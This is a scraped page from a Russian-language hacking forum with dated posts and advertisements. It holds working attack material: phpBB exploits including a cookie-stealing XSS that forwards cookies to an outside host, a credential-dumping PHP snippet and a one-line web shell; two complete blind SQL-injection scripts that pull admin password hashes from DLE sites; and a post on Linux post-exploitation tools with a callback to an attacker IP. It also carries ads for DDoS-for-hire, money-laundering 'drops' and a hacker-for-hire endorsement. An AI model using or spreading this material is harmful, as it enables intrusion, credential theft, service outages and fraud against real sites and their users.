Написано
: 24 Ноябрь 2015 - 04:27
Информация рекламнадателям!
Если вы решили разместить рекламу на нашем форуме в виде Банера на всех страницах форума, либо пометить ваше объявление как "Важное" и так далее,
просьба обращаться на почту:
XpRu@protonmail.com
Написано
: 28 Февраль 2016 - 08:42
Написано
: 23 Ноябрь 2015 - 11:11
[c*olor*=#EFE*FEF][forbidden link][/UR*L] phpbb 2.0.17 Рушиться структура, код надо доработать[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg] [*url]ww*w.ut[forbidden link][/u*rl]' [*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]
Написано
: 04 Май 2016 - 11:07
Написано
: 04 Май 2016 - 12:02
Написано
: 15 Июль 2020 - 01:55
Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше!
Пост-эксплуатация в практике пен-теста
Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений.
Фазы (этапы) проведения тестирования на проникновение
Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации:
получить доступ на выполнение произвольного кода\команд
изучение данных, хранящихся на сервере
перехват данных, которых нет на системе сейчас, но они могут появиться в будущем
организация перманентного доступа к целевой системе
эскалация привилегий до уровня системы для непривилегированной учетной записи
Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры:
конфигурацию системы (логин и пароль к БД в исходных кодах)
конфигурацию веб-сервера (например, httpd.conf, .htaccess)
исходные коды приложения (поиск уязвимостей, анализируя логику приложения)
доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети)
базы данных (аутентификационная информация к другим системам, хранящаяся в них
Обзор инструментов пост-эксплуатации
Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы.
1. PXEenum — полное перечисление всего что есть в системе
Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время.
Для запуска он не требует прав root’а, работает в стандартном терминале.
# wget https://raw.githubus...ster/PXEnume.sh
Установка:
# git clone https://github.com/s...uong/PXEnum.git
# cd PXEnum/
# chmod +x PXEnum.sh
# bash PXEnum.sh
2. MIDA Multitool — палим систему по взрослому
Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно:
SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д.
Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев.
Устанавливаем скрипт в систему с github:
# git clone https://github.com/N...h-Kit-Multitool
# cd Bash-Kit-Multitool
# chmod +x bashkit.sh
Запускаем скрипт:
# /.bashkit.sh
Дело сделано! Можно запускать в системе!
3. MimiPenguin — тырим пароли без зазрения совести
Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей)
Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux.
Устанавливаем MimiPenguin забирая его с репозитория GitHub:
# git clone https://github.com/h...gal/mimipenguin
# cd mimipenguin
# ls –a
# chmod +x mimipenguin.sh
# ./mimipenguin.sh
4. LARE — ломимся под рута используя баги ядра
И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8.
Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP.
Устанавливаем скрипт в систему:
# git clone https://github.com/EnigmaDimitri/LARE && cd LARE
# chmod +x LARA.sh
# LARE.sh -a
Запуск скрипта на целевой машине в сети
# LARE.sh -l [Attackers-IP]
Запуск на машине с подключением к базе данных эксплойтов на GitHub
# LARE.sh -l or ./LARE.sh -l
Проверка и защита системы от техник пост-эксплуатации
Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
Написано
: 15 Февраль 2016 - 10:20
Написано
: 23 Ноябрь 2015 - 11:10
<html><head></head><body> <form method="post" action="http://domain_name/board_directory/admin/admin_ug_auth.php">User Level: <select name="userlevel"><option value="admin">Administrator</option><option value="user">User</option></select><input type="hidden" name="private[1]" value="0"><input type="hidden" name="moderator[1]" value="0"><input type="hidden" name="mode" value="user"><input type="hidden" name="adv" value="">User Number: <input type="text" name="u" size="5"><input type="submit" name="submit" value="Submit"> </form></body></html>
<?phpinclude('config'.'.php');echo "DB Type: $dbms <br>";echo "DB Host: $dbhost <br>";echo "DB Name: $dbname <br>";echo "DB User: $dbuser <br>";echo "DB Pass: $dbpasswd <br>";exit;?><html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/> </form> <script> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script>'; document.search.submit(); </script> </body> </html>
-------------exploit.htm--------------<form name='f' action="http://site/profile.php?mode=editprofile" method="post"><input name="avatarselect" value='" ><script>alert(document.cookie)</script>'><input type="submit" name="submitavatar" value="Select avatar"></form><script>window.onload=function(){document.all.submitavatar.click();}</script>---------------end-------------------<?system($cmd)?>
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url']: $HTTP_GET_VARS['smile_url'];$smile_url = phpbb_ltrim(basename($smile_url), "'");$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];$smile_code = trim($smile_code);$smile_url = trim($smile_url);$smile_emotion = trim($smile_emotion); // If no code was entered complain ...if ($smile_code == '' || $smile_url == ''){message_die(GENERAL_MESSAGE, $lang['Fields_empty']);} //// Convert < and > to proper htmlentities for parsing.//$smile_code = str_replace('<', '<', $smile_code);$smile_code = str_replace('>', '>', $smile_code); //// Save the data to the smiley table.//$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)VALUES ('" . str_replace("'", "''", $smile_code) . "', '" . str_replace("'", "''", $smile_url) . "', '" . str_replace("'", "''", $smile_emotion) . "')";$result = $db->sql_query($sql);/includes/usercp_sendpasswd.php line 51"$user_actkey = gen_rand_string(true);" and than generate a password. /includes/usercp_sendpasswd.php line 55"$user_password = gen_rand_string(false);"
/profile.php line 61function gen_rand_string($hash){$chars = array( 'a', 'A', 'b', 'B', 'c', 'C', 'd', 'D', 'e', 'E', 'f', 'F', 'g', 'G', 'h', 'H', 'i', 'I', 'j', 'J', 'k', 'K', 'l', 'L', 'm', 'M', 'n', 'N', 'o', 'O', 'p', 'P', 'q', 'Q', 'r', 'R', 's', 'S', 't', 'T', 'u', 'U', 'v', 'V', 'w', 'W', 'x', 'X', 'y', 'Y', 'z', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); $max_chars = count($chars) - 1;srand( (double) microtime()*1000000); $rand_str = '';for($i = 0; $i < 8; $i++){$rand_str = ( $i == 0 ) ? $chars[rand(0, $max_chars)] : $rand_str . $chars[rand(0, $max_chars)];} return ( $hash ) ? md5($rand_str) : $rand_str;
Написано
: 04 Июль 2016 - 08:33
Написано
: 29 Май 2016 - 02:52
Написано
: 25 Сентябрь 2020 - 01:55
Никаких особенных заказов у этого хакера я не делал. Стандартный взлом, обычной странички, ничего такого. Ну собственно работа выполнена, выполнена в целом неплохо.. Результат меня устроил, поэтому этого взломщика я могу посоветовать другим людям. Его почта - xakerfox@mail.ru. Моя оценочка 5/5.. Ничего лишнего, удачной работы вам!
Написано
: 09 Январь 2019 - 05:47
Как легко, получается создают фишинговый сайт (или как оно там) и просто ломают аккаунты?
Да, этот называется фишинг. Согласно википедии:
Фишинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям. Это достигается путём проведения массовых рассылок электронных писем от имени популярных брендов, а также личных сообщений внутри различных сервисов, например, от имени банков или внутри социальных сетей. В письме часто содержится прямая ссылка на сайт, внешне неотличимый от настоящего, либо на сайт с редиректом. После того как пользователь попадает на поддельную страницу, мошенники пытаются различными психологическими приёмами побудить пользователя ввести на поддельной странице свои логин и пароль, которые он использует для доступа к определённому сайту, что позволяет мошенникам получить доступ к аккаунтами и банковским счетам.
Написано
: 01 Июль 2018 - 10:19
Мы предлагаем получить средства под определенный процент.
Плюсы в том что вы не рискуете не чем, всю работу дроп берет на себя, забирает процент от суммы и остальные деньги переводит на любой счет который скажете, лимита по сумме нет.
Возможны переводы Western Union, мигом и прочие переводы, Вы можете не беспокоится за ваши деньги и проблемы с выводом.
По вопросам заключения сделки, обращайтесь в личные сообщения или Телеграм
@XpRo_bot
Написано
: 28 Февраль 2016 - 08:11
http://www.site.ru/index.php?do=files&op=cat&id=1&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+0,1),1,1))+between+0+and+0,url,[b](select%201%20from%20dle_downloads))+--+
<?phpset_time_limit(0);/*-----------------------------------------------------*/ //Эксплойт для модуля Files(модуль файлового архива) к DLE//Автор: H00K/*-----------------------------------------------------*/ /*-----------------Настройки---------------------------*/ $host="symbiware.org";//указываем хост$catid = "38";//Указываем id существующей категории$userid = "0";//Указываем id администратора/*-----------------------------------------------------*/ $good = "MySQL Fatal Error";$bad = "Архив файлов";$path="/index.php?do=files&op=cat&id={$catid}&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+{$userid},1),";$end = ",(select%201%20from%20dle_downloads),url)+--+";$index = 1;$result = ""; function GetMiddle($min, $max){ return floor($min+((($max+1)-($min-1))/2));} function Check($min,$max){ if (($max-$min)<=2) { global $index; global $result; global $host; global $path; echo "Символ найден: "; if (($max-$min)==1) if (CheckSQL($host, $path, $index.",1))={$max}")) $result .=chr($max); else $result .=chr($min); if (($max-$min)==2) { if (CheckSQL($host, $path, $index.",1))={$max}")) { $result .=chr($max); } else { if(CheckSQL($host, $path, $index.",1))={$max}-1")) $result .=chr($max-1); else $result .=chr($min); } } echo substr($result,strlen($result)-1)."<br>"; flush(); $index++; return true; } else return false;} function CheckSQL ($host, $path, $st){ global $end; $line=""; $fo = fsockopen($host, 80, $errno, $errstr, 30); if(!$fo){die ("no connect");} else { $headers="GET ".$path.$st.$end." HTTP/1.1rn"; $headers.="Host: ".$host."rn"; $headers.="Connection: Closernrn"; global $good; global $bad; fwrite($fo, $headers); while (!feof($fo)) { $line = fgets($fo, 512); if (strpos($line,$good)) { fclose($fo); return true; } if (strpos($line,$bad)) { fclose($fo); return false; } } fclose($fo); } return false;}if (CheckSQL($host, $path, $index.",1))+between+1+and+255")) echo (" Идет подбор символов...<br>"); else die("Ошибка"); for ($i=0;$i<32;$i++){ $min = 31; $max = 123; $ok = true; while ($ok == true) { $num = GetMiddle($min,$max); if (!check($min,$max)) { if (CheckSQL($host, $path, $index.",1))+between+1+and+{$num}")) { echo("Меньше $num <br>"); $max = $num; } else { echo ("Больше $num <br>"); $min = $num; } flush(); } else $ok = false; } }echo $result;?>if ( isset($_POST['news_sort']) ) $galConfig['news_sort'] = mysql_escape_string($_POST['news_sort']); elseif ($gal_cat[$category_id]['news_sort'] != "") $galConfig['news_sort'] = $gal_cat[$category_id]['news_sort'];if ( isset($_POST['news_msort']) ) $galConfig['news_msort'] = mysql_escape_string($_POST['news_msort']); elseif ($gal_cat[$category_id]['news_msort'] != "") $galConfig['news_msort'] = $gal_cat[$category_id]['news_msort']; if ($galConfig['user_cats_limit']) $sear = "(" . PREFIX . "_gal_cat.cat_status = '0' OR " . PREFIX . "_gal_cat.cat_status = '2') AND " . PREFIX . "_gal_pic.approve='1'"; else $sear = "" . PREFIX . "_gal_cat.cat_status = '0' AND " . PREFIX . "_gal_pic.approve='1'"; $result = $db->query("SELECT " . PREFIX . "_gal_pic.*, " . PREFIX . "_gal_cat.cat_title, cat_alt_name, allow_rating, allow_comm FROM " . PREFIX . "_gal_pic LEFT JOIN " . PREFIX . "_gal_cat ON " . PREFIX . "_gal_pic.pic_cat_id=" . PREFIX . "_gal_cat.cat_id WHERE " . PREFIX . "_gal_cat.cat_alt_name='$category' AND $sear AND " . PREFIX . "_gal_cat.cat_view_level regexp '[[:<:]]($member_id[user_group])[[:>:]]' ORDER BY ".$galConfig['news_sort']." ".$galConfig['news_msort']." LIMIT $cstart, $lim");POST /index.php?do=gallery&action=show_cat&category=gorod HTTP/1.1Host: www.simfilife.netUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127Keep-Alive: 300Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 133news_sort=if(ord(substring((select password from dle_users where user_id=1),1,1))>4,(select 1 from dle_usergroups),0)&news_msort=DESC
<?php set_time_limit(0); /*-----------------------------------------------------*/ //Эксплойт для неофициального модуля Gallery для DLE//Автор: l-l00K/*-----------------------------------------------------*/ /*-----------------Настройки---------------------------*/ $good = "MySQL Fatal Error"; $bad = "robots"; $host= "simfilife.net";//указываем сайт $path="/index.php?do=gallery&action=show_cat&category=gorod";//Указываем существующую категорию $body = "news_sort=if(ord(substring((select password from dle_users where user_id=1),"; $index = 1; $result = ""; $end = ",(select 1 from dle_usergroups),0)&news_msort=DESC"; function GetMiddle($min, $max) { return floor($min+((($max+1)-($min-1))/2)); } function post_sql($host,$path,$post_body) { global $end; $post_body .= $end; $post_query = "POST ".$path." HTTP/1.1rn"; $post_query .= "Host: ".$host."rn"; $post_query .= "Connection: closern"; $post_query .= "Content-Type: application/x-www-form-urlencodedrn"; $post_query .= "Content-length: " . strlen($post_body) . "rnrn"; $post_query .= $post_body; $sock = fsockopen($host, 80, $errno, $errstr, 30); if (!$sock) die('Could not connect to host! '); fputs($sock, $post_query); global $good; global $bad; $answer = ''; while (!feof($sock)) { $answer .= fgets($sock, 1024); if (strpos($answer,$good)) { fclose($sock); return true; } if (strpos($answer,$bad)) { fclose($sock); return false; } } fclose($sock); return false;} function Check($min,$max){ if (($max-$min)<=2) { global $index; global $result; global $host; global $path; global $body; echo "Символ найден: "; if (($max-$min)==1) if (post_sql($host, $path, $body.$index.",1))={$max}")) $result .=chr($max); else $result .=chr($min); if (($max-$min)==2) { if (post_sql($host, $path, $body.$index.",1))>{$max}-1")) { $result .=chr($max); } else { if(post_sql($host, $path, $body.$index.",1))={$max}-1")) $result .=chr($max-1); else $result .=chr($min); } } echo substr($result,strlen($result)-1)."<br>"; flush(); $index++; return true; } else return false;} $bool = true;while ($bool==true){ if (post_sql($host, $path, $body.$index.",1))>0")) { echo ("Символ есть, идет подбор...<br>"); flush(); $ok = true; } else { echo ("Символы кончились <br>"); $ok = false; $bool = false; echo $result; } $min = 31; $max = 123; while ($ok == true) { $num = GetMiddle($min,$max); if (!check($min,$max)) { if (post_sql($host, $path, $body.$index.",1))<{$num}")) { echo("Меньше $num <br>"); $max = $num; } else { echo ("Больше $num <br>"); $min = $num; } flush(); } else $ok = false; } } ?>
Написано
: 15 Август 2016 - 09:35
Доброго времени суток !
Написано
: 05 Июль 2016 - 09:10
Написано
: 12 Май 2022 - 07:19
Доброго времени суток, предлагаем вашему вниманию наш сервис.
Мы предлагаем услуги по устранению сайтов и форумов ваших конкурентов при помощи DDOS атаки.Берёмся практически за любые проекты начиная от слабых и заканчивая серверами с высокой защитой!Наш сервис это быстрое решение ваших проблем с конкурентами и недругами.Оптовым заказчикам индивидуальные условия!Преимущества нашего сервиса-Работаем с гарантом.- Низкие цены (от 50$)- Круглосуточный приём заказов- 100% Анонимности- Круглосуточный мониторинг всех атакуемых ресурсов- Работаем со всеми типами атак- Оперативный MoneyBack (возврат денежных средств), в случае неудачи.- Атакуемые ресурсы во время атаки не подают признаков жизни, как это часто бывает у других.- Регулярные скидки.- Виды АТАК.- SYN, UDP, DNS Amplification, Spoofed UDP, Spoofed SYN, XML-RPC, HTTP, GET, POST, TCP ACK / Reflection, DNS Amplification и многое другое ...-Предоставляем тест на 5-10 минут только проверенным заказчикам или людям с репутацией.-Для остальных тест платный - 5$ Сумма зачтется при оплате заказаного периода.-При неудачном тесте и прочих форс-мажорных ситуация,деньги за тест будут возвращены.Цены- Сутки - от 50$- Неделя - от 300$- Месяц - от 1000$Способы оплаты- BTC- QIWI-ALLCOINНаши контакты- ICQ 266-444- Jabber liberty789@jabber.ru- Telegramm https://t.me/Liberty789Пройденные проверки сервиса, отзывы администраторов, гарантов :Теги для google: как устранить сайт конкурента, как убрать сайт конкурента,Нddos атака на заказ, хакерская атака, как навредить сайту, как навредить серверу, остановить работусайта, остановить работу сервера, отключить/устранить сайт конкурента, как удалить сайт, остановить работу сайта,отключить сайт конкурента, как завалить сайт, ddos атака, как убить сайт, need to ddos site,вывести сайт из строя,вывести сервер из строя, ddos service, site ddos, massive ddos attack, убить сайт, убить сервер, положить сайт,
Написано
: 28 Февраль 2016 - 10:45
Написано
: 07 Август 2018 - 07:50
Написано
: 04 Апрель 2017 - 07:28
